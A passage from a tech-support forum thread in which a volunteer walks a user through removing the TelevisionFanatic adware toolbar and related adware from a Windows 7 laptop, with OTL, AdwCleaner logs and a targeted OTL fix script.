"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6A05FEDF-662E-46BF-8A25-010E3F1C9C69}" = Windows Live UX Platform Language Pack
"{6E932CA6-FD17-7694-FD7C-14CE25770EA5}" = Catalyst Control Center Graphics Previews Common
"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-toshiba" = WildTangent Games App (Toshiba Games)
"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-wildgames" = WildTangent Games App
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{739A6E9D-5D7D-8A5D-EC8A-4BD11E5749AA}" = CCC Help Hungarian
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{80956555-A512-4190-9CAD-B000C36D6B6B}" = Windows Live Messenger
"{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}" = Windows Live Sync
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek 8136 8168 8169 Ethernet Driver
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8C72927B-7410-131A-E641-B9C505F4973C}" = CCC Help Japanese
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010
"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010
"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010
"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010
"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010
"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010
"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010
"{90140000-003D-0000-0000-0000000FF1CE}" = Microsoft Office Single Image 2010
"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010
"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010
"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010
"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{911AB6CA-E04C-1E98-523D-8FCFAB4F456C}" = CCC Help Czech
"{9216C6A7-694A-4437-BD00-BD1CF58E1839}" = CCC Help Spanish
"{92DE68CE-BC3E-7323-EA53-99490C8BD34D}" = Catalyst Control Center Graphics Light
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{95120000-00AF-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint Viewer 2007 (English)
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9668AE11-E05C-8169-F6D8-FBF7B507D7DB}" = CCC Help German
"{96AE7E41-E34E-47D0-AC07-1091A8127911}" = Realtek USB 2.0 Card Reader
"{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}" = Toshiba Application and Driver Installer
"{979587FD-F264-3C71-B0BE-6FC8DA993790}" = CCC Help Thai
"{999307CD-D57D-8C98-27ED-07F384ACFAA1}" = CCC Help Turkish
"{9AEAF9CC-390B-49C0-8F7F-14092BF163B6}" = NetZero Launcher
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A7594D38-0B7E-BCF7-A938-1AC03A6477FB}" = CCC Help English
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer
"{AC6569FA-6919-442A-8552-073BE69E247A}" = TOSHIBA Service Station
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.09)
"{AC7BE07B-14D3-6EB5-814A-EB0A63CBFB47}" = CCC Help Polish
"{AF844339-2F8A-4593-81B3-9F4C54038C4E}" = Windows Live MIME IFilter
"{B1CDB3C6-8DD8-4864-8589-BDFBDA033941}" = CCC Help Chinese Traditional
"{B4BB4CF2-F475-FB20-7AFA-F8AED032BFF8}" = ATI Catalyst Install Manager
"{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}" = TOSHIBA Recovery Media Creator
"{BDABF8CD-7436-EC6C-DD82-439225E22557}" = CCC Help Finnish
"{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}" = Toshiba Online Backup
"{C5A15C68-0DF3-8A13-352E-E605491D7E3D}" = Catalyst Control Center InstallProxy
"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail
"{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}" = PlayReady PC Runtime x86
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{CFAE78A9-A7A4-537E-7CC0-5A794FFBF73F}" = Catalyst Control Center Core Implementation
"{D19A1978-2FB2-B39A-5D30-C1EA38F788DD}" = CCC Help Danish
"{D4322448-B6AF-4316-B859-D8A0E84DCB38}" = TOSHIBA HDD/SSD Alert
"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{D8634D93-03DD-01F1-AC7D-EE468AA24F45}" = CCC Help Dutch
"{DA84ECBF-4B79-47F2-B34C-95C38484C058}" = Skype Launcher
"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E151E679-4EC8-36F9-A691-C7600688A1CA}" = CCC Help Chinese Standard
"{E3D63B95-4B21-414A-A2C7-D6D6A6AC6D79}" = Catalyst Control Center - Branding
"{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}" = Microsoft Office Suite Activation Assistant
"{E69992ED-A7F6-406C-9280-1C156417BC49}" = Toshiba Quality Application
"{EB4DF488-AAEF-406F-A341-CB2AAA315B90}" = Windows Live Messenger
"{EBC6193C-ED23-E332-9A9C-D5CB83CDDE2B}" = Catalyst Control Center Localization All
"{EE033C1F-443E-41EC-A0E2-559B539A4E4D}" = TOSHIBA Speech System Applications
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F3529665-D75E-4D6D-98F0-745C78C68E9B}" = TOSHIBA ConfigFree
"{F544CA20-6810-E275-D288-F0D92CFADE4A}" = CCC Help Greek
"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials
"{FEDD27A0-B306-45EF-BF58-B527406B42C8}" = TOSHIBA Value Added Package
"{FEED29DD-7BF3-582C-3353-1F2634C2323D}" = CCC Help Portuguese
"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 15 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 11.6
"am-plantsvszombiestm" = Plants vs. Zombies™
"CCleaner" = CCleaner
"Google Chrome" = Google Chrome
"InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}" = TOSHIBA Supervisor Password
"InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}" = TOSHIBA Hardware Setup
"InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}" = TOSHIBA Extended Tiles for Windows Mobility Center
"InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}" = TOSHIBA Flash Cards Support Utility
"InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}" = TOSHIBA HDD/SSD Alert
"InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}" = TOSHIBA Value Added Package
"InstallWIX_{653C1B5A-3287-47B1-8613-0745D4E771C4}" = Kaspersky Internet Security
"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware version 2.0.3.1025
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Microsoft Security Client" = Microsoft Security Essentials
"Mozilla Firefox 33.0.3 (x86 en-US)" = Mozilla Firefox 33.0.3 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Office14.SingleImage" = Microsoft Office Home and Student 2010
"Spotify" = Spotify
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"TelevisionFanaticbar Uninstall" = TelevisionFanatic Toolbar
"WildTangent toshiba Master Uninstall" = WildTangent Games
"WinLiveSuite" = Windows Live Essentials
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 4/3/2014 11:35:44 PM | Computer Name = Mom-PC | Source = Application Hang | ID = 1002
Description = The program Explorer.EXE version 6.1.7600.16768 stopped interacting
 with Windows and was closed. To see if more information about the problem is available,
 check the problem history in the Action Center control panel.    Process ID: 620    Start
 Time: 01cf400a51f6eade    Termination Time: 1204    Application Path: C:\windows\Explorer.EXE
 
Report
 Id: 2d84443a-bbaa-11e3-8f4b-88ae1d506189  
 
Error - 4/12/2014 7:35:18 PM | Computer Name = Mom-PC | Source = Application Hang | ID = 1002
Description = The program Explorer.EXE version 6.1.7600.16768 stopped interacting
 with Windows and was closed. To see if more information about the problem is available,
 check the problem history in the Action Center control panel.    Process ID: 744    Start
 Time: 01cf56a7b375a687    Termination Time: 0    Application Path: C:\windows\Explorer.EXE
 
Report
 Id: 0bbbffbf-c29b-11e3-9797-88ae1d506189  
 
Error - 5/9/2014 9:05:09 PM | Computer Name = Mom-PC | Source = Application Error | ID = 1000
Description = Faulting application name: firefox.exe, version: 28.0.0.5186, time
 stamp: 0x53240e37  Faulting module name: xul.dll, version: 28.0.0.5186, time stamp:
 0x53240e04  Exception code: 0xc0000005  Fault offset: 0x00184729  Faulting process id:
 0x990  Faulting application start time: 0x01cf601bef1f525f  Faulting application path:
 C:\Program Files\Mozilla Firefox\firefox.exe  Faulting module path: C:\Program Files\Mozilla
 Firefox\xul.dll  Report Id: 214a2e57-d7df-11e3-9797-88ae1d506189
 
Error - 5/23/2014 7:44:17 PM | Computer Name = Mom-PC | Source = System Restore | ID = 8193
Description = 
 
Error - 6/2/2014 9:05:58 PM | Computer Name = Mom-PC | Source = Application Error | ID = 1000
Description = Faulting application name: GoogleUpdate.exe, version: 1.2.183.9, time
 stamp: 0x4ad50798  Faulting module name: goopdate.dll_unloaded, version: 0.0.0.0,
 time stamp: 0x53604624  Exception code: 0xc0000005  Fault offset: 0x6241dab2  Faulting
 process id: 0x1610  Faulting application start time: 0x01cf7e6cfcf73ef1  Faulting application
 path: C:\Program Files\Google\Update\GoogleUpdate.exe  Faulting module path: goopdate.dll
Report
 Id: 37f276a4-eabb-11e3-899c-88ae1d506189
 
Error - 6/11/2014 9:38:40 PM | Computer Name = Mom-PC | Source = System Restore | ID = 8193
Description = 
 
Error - 7/8/2014 8:20:15 PM | Computer Name = Mom-PC | Source = System Restore | ID = 8193
Description = 
 
Error - 9/16/2014 10:49:33 PM | Computer Name = Mom-PC | Source = Microsoft Office 14 | ID = 2000
Description = Microsoft Publisher: Accepted Safe Mode action : Publisher failed 
to start correctly last time.  Starting Publisher in safe mode will help you correct
 or isolate a startup problem in order to successfully start the program.  Some 
functionality may be disabled in this mode.  Do you want to start Publisher in safe
 mode?.
 
Error - 9/16/2014 10:56:06 PM | Computer Name = Mom-PC | Source = Microsoft Office 14 | ID = 2001
Description = Microsoft Publisher: Rejected Safe Mode action : Publisher failed 
to launch in safe mode. Do you want to start repair?.
 
Error - 9/16/2014 11:01:38 PM | Computer Name = Mom-PC | Source = Microsoft Office 14 | ID = 2000
Description = Microsoft Publisher: Accepted Safe Mode action : Publisher failed 
to start correctly last time.  Starting Publisher in safe mode will help you correct
 or isolate a startup problem in order to successfully start the program.  Some 
functionality may be disabled in this mode.  Do you want to start Publisher in safe
 mode?.
 
Error - 11/8/2014 12:15:10 AM | Computer Name = Mom-PC | Source = Application Error | ID = 1000
Description = Faulting application name: plugin-container.exe, version: 33.0.2.5413,
 time stamp: 0x544ef530  Faulting module name: mozalloc.dll, version: 33.0.2.5413,
 time stamp: 0x544ed089  Exception code: 0x80000003  Fault offset: 0x00001425  Faulting
 process id: 0x1270  Faulting application start time: 0x01cff72bf9232302  Faulting application
 path: C:\Program Files\Mozilla Firefox\plugin-container.exe  Faulting module path:
 C:\Program Files\Mozilla Firefox\mozalloc.dll  Report Id: d38e950e-66fd-11e4-922c-88ae1d506189
 
[ System Events ]
Error - 11/9/2014 8:23:27 PM | Computer Name = Mom-PC | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the ShellHWDetection service.
 
Error - 11/9/2014 8:23:28 PM | Computer Name = Mom-PC | Source = atikmdag | ID = 43029
Description = Display is not active
 
Error - 11/9/2014 8:26:45 PM | Computer Name = Mom-PC | Source = BROWSER | ID = 8032
Description = 
 
Error - 11/9/2014 11:44:35 PM | Computer Name = Mom-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description = Installation Failure: Windows failed to install the following update
 with error 0x800736b3: Windows 7 Service Pack 1 (KB976932).
 
Error - 11/9/2014 11:48:13 PM | Computer Name = Mom-PC | Source = atikmdag | ID = 52236
Description = CPLIB :: General - Invalid Parameter
 
Error - 11/9/2014 11:48:13 PM | Computer Name = Mom-PC | Source = atikmdag | ID = 43029
Description = Display is not active
 
Error - 11/9/2014 11:48:28 PM | Computer Name = Mom-PC | Source = Service Control Manager | ID = 7000
Description = The TelevisionFanaticService service failed to start due to the following
 error:   %%5
 
Error - 11/9/2014 11:51:10 PM | Computer Name = Mom-PC | Source = BROWSER | ID = 8032
Description = 
 
Error - 11/10/2014 12:21:55 AM | Computer Name = Mom-PC | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the NlaSvc service.
 
Error - 11/10/2014 12:21:58 AM | Computer Name = Mom-PC | Source = atikmdag | ID = 43029
Description = Display is not active
 
 
< End of report >

  • 0

#4
crooleeck

crooleeck

    Member

  • Member
  • PipPipPip
  • 882 posts
 

I'm not silver moma, but I'm pretty sure your response was intended for me


Yes, my apologies for that.
 
 
Step 1:
 
AdwCleaner fix:

  • run AdwCleaner and select Scan
  • On completion of the scan please click on Delete button
  • when it has finished it will ask to reboot - allow the reboot
  • on reboot a log will be showed, please copy content and post in next replay

Step 2:
OTL fix:
Please copy following script:


:commands
[createrestorepoint]

:otl
SRV - [2012/11/20 07:36:01 | 000,042,504 | ---- | M] () [Auto | Stopped] -- C:\Program Files\TelevisionFanatic\bar\1.bin\64barsvc.exe -- (TelevisionFanaticService)

IE - HKLM\..\SearchScopes,DefaultScope = {B13C4182-9A7F-4F29-B480-F668606BC906}
IE - HKLM\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.google.co...ng}&rlz=1I7TSNA
IE - HKLM\..\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}: "URL" = http://search.mywebs...r={searchTerms}
IE - HKLM\..\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}: "URL" = http://astromenda.co...r=582993201&ir=

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.70searchengines.com/?op [Binary data over 200 bytes]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://home.mywebsea...CFYF7Qgod_RIAQg
IE - HKCU\..\URLSearchHook: {0696f815-a3a9-490a-bb14-9ec3350b1276} - No CLSID value found
IE - HKCU\..\SearchScopes,DefaultScope = {B13C4182-9A7F-4F29-B480-F668606BC906}
IE - HKCU\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.google.co...TSNA_en___US411
IE - HKCU\..\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}: "URL" = http://search.mywebs...r={searchTerms}
IE - HKCU\..\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}: "URL" = http://www.google.co...TSNA_en___US411

O2 - BHO: (Search Assistant BHO) - {5d79f641-c168-40df-a32f-bacea7509e75} - C:\Program Files\TelevisionFanatic\bar\1.bin\64SrcAs.dll ()
O2 - BHO: (Toolbar BHO) - {cb41fc95-f1b3-4797-8bb6-1012ff62abba} - C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll ()
O3 - HKLM\..\Toolbar: (TelevisionFanatic) - {c98d5b61-b0ea-4d48-9839-1079d352d880} - C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll ()
O3 - HKCU\..\Toolbar\WebBrowser: (TelevisionFanatic) - {C98D5B61-B0EA-4D48-9839-1079D352D880} - C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll ()
O4 - HKLM..\Run: [TelevisionFanatic Browser Plugin Loader] C:\Program Files\TelevisionFanatic\bar\1.bin\64brmon.exe ()
O4 - HKLM..\Run: [TelevisionFanatic Search Scope Monitor] C:\Program Files\TelevisionFanatic\bar\1.bin\64SrchMn.exe ()

[2014/11/08 14:02:08 | 000,000,000 | ---D | C] -- C:\ProgramData\2308189059
[2014/11/08 13:58:48 | 000,000,000 | ---D | C] -- C:\Program Files\DealsFinderPro
[2014/11/08 08:02:20 | 000,000,000 | ---D | C] -- C:\ProgramData\SaveItCoupons
[2014/11/08 08:01:03 | 000,000,000 | ---D | C] -- C:\ProgramData\DealsFinderPro
[2014/11/08 07:07:31 | 000,000,000 | ---D | C] -- C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7
[2014/11/08 07:04:00 | 000,000,000 | ---D | C] -- C:\ProgramData\5ace784aaccbed8e

:reg
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"TelevisionFanaticbar Uninstall"=-

:files
C:\Program Files\TelevisionFanatic

:commands
[emptytemp]


Run OTL, under Custom Scan/Fixes paste it. Close all windows except OTL and hit Run Fix button. Please agreed for restart. After computer starts, OTL will display removing log, please post it.


  • 0

#5
mulligabuck

mulligabuck

    Member

  • Topic Starter
  • Member
  • PipPip
  • 62 posts

Well, this is embarrassing. Somehow I seem to have deleted every trace of the adwCleaner log. I was certain that I had saved the file AND had pasted its contents into a text window, but then there was no trace of it. I did run the delete operation, and it did show that it had deleted Television Fanatic, but I don't have the log to show you - I'm sorry.

 

Here's the OTL removal log:

 

All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
Error: No service named TelevisionFanaticService was found to stop!
Service\Driver key TelevisionFanaticService not found.
File C:\Program Files\TelevisionFanatic\bar\1.bin\64barsvc.exe not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B13C4182-9A7F-4F29-B480-F668606BC906}\ not found.
HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Secondary Start Pages| /E : value set successfully!
HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page| /E : value set successfully!
Registry value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks\\{0696f815-a3a9-490a-bb14-9ec3350b1276} not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0696f815-a3a9-490a-bb14-9ec3350b1276}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{0696f815-a3a9-490a-bb14-9ec3350b1276}\ deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B13C4182-9A7F-4F29-B480-F668606BC906}\ not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5d79f641-c168-40df-a32f-bacea7509e75}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5d79f641-c168-40df-a32f-bacea7509e75}\ not found.
File C:\Program Files\TelevisionFanatic\bar\1.bin\64SrcAs.dll not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{cb41fc95-f1b3-4797-8bb6-1012ff62abba}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cb41fc95-f1b3-4797-8bb6-1012ff62abba}\ not found.
File C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\{c98d5b61-b0ea-4d48-9839-1079d352d880} not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c98d5b61-b0ea-4d48-9839-1079d352d880}\ not found.
File C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll not found.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{C98D5B61-B0EA-4D48-9839-1079D352D880} not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C98D5B61-B0EA-4D48-9839-1079D352D880}\ not found.
File C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\TelevisionFanatic Browser Plugin Loader not found.
File C:\Program Files\TelevisionFanatic\bar\1.bin\64brmon.exe not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\TelevisionFanatic Search Scope Monitor not found.
File C:\Program Files\TelevisionFanatic\bar\1.bin\64SrchMn.exe not found.
Folder C:\ProgramData\2308189059\ not found.
Folder C:\Program Files\DealsFinderPro\ not found.
Folder C:\ProgramData\SaveItCoupons\ not found.
Folder C:\ProgramData\DealsFinderPro\ not found.
C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7 folder moved successfully.
Folder C:\ProgramData\5ace784aaccbed8e\ not found.
========== REGISTRY ==========
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\TelevisionFanaticbar Uninstall not found.
========== FILES ==========
File\Folder C:\Program Files\TelevisionFanatic not found.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Mom
->Temp folder emptied: 14036636 bytes
->Temporary Internet Files folder emptied: 186418867 bytes
->Java cache emptied: 11491 bytes
->FireFox cache emptied: 445683903 bytes
->Google Chrome cache emptied: 30843550 bytes
->Flash cache emptied: 2876792 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 987798 bytes
RecycleBin emptied: 24954476 bytes
 
Total Files Cleaned = 673.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 11102014_144655
 
Files\Folders moved on Reboot...
File\Folder C:\windows\temp\obuA0F2.tmp not found!
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...

  • 0

#6
crooleeck

crooleeck

    Member

  • Member
  • PipPipPip
  • 882 posts

Well, this is embarrassing. Somehow I seem to have deleted every trace of the adwCleaner log.

Don't worry. Please look for C:\AdwCleaner\AdwCleaner[SX].txt - where X should be digit, probably 1. Post if you find it.
 
Anyway, I need to take a second look. Please prepare FRST log:
Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

  • 0

#7
mulligabuck

mulligabuck

    Member

  • Topic Starter
  • Member
  • PipPip
  • 62 posts

Found the adwCleaner report, right where you said \it would be. It's pasted below, followed by frst.txt and then addition.txt.

 

# AdwCleaner v4.101 - Report created 10/11/2014 at 14:34:23
# Updated 09/11/2014 by Xplode
# Database : 2014-11-10.7 [Live]
# Operating System : Windows 7 Home Premium  (32 bits)
# Username : Mom - MOM-PC
# Running from : C:\Users\Mom\Desktop\adwcleaner_4.101.exe
# Option : Clean

***** [ Services ] *****

[#] Service Deleted : TelevisionFanaticService

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\2308189059
Folder Deleted : C:\ProgramData\Partner
Folder Deleted : C:\ProgramData\Trymedia
Folder Deleted : C:\ProgramData\DealsFinderPro
Folder Deleted : C:\ProgramData\SaveItCoupons
Folder Deleted : C:\ProgramData\5ace784aaccbed8e
Folder Deleted : C:\Program Files\TelevisionFanatic
Folder Deleted : C:\Program Files\DealsFinderPro
Folder Deleted : C:\Users\Mom\AppData\Local\iac
Folder Deleted : C:\Users\Mom\AppData\Local\TelevisionFanatic
Folder Deleted : C:\Users\Mom\AppData\LocalLow\TelevisionFanatic
Folder Deleted : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\Extensions\[email protected]
Folder Deleted : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\Extensions\[email protected]
File Deleted : C:\Users\Mom\Desktop\Uninstall.exe
File Deleted : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\searchplugins\astromenda.xml
File Deleted : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\user.js
File Deleted : C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage
File Deleted : C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage-journal

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]]
Key Deleted : HKCU\Software\Google\Chrome\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [TelevisionFanatic Browser Plugin Loader]
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [TelevisionFanatic Search Scope Monitor]
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{04D2B915-19FF-41E9-994D-95DC898BEA43}
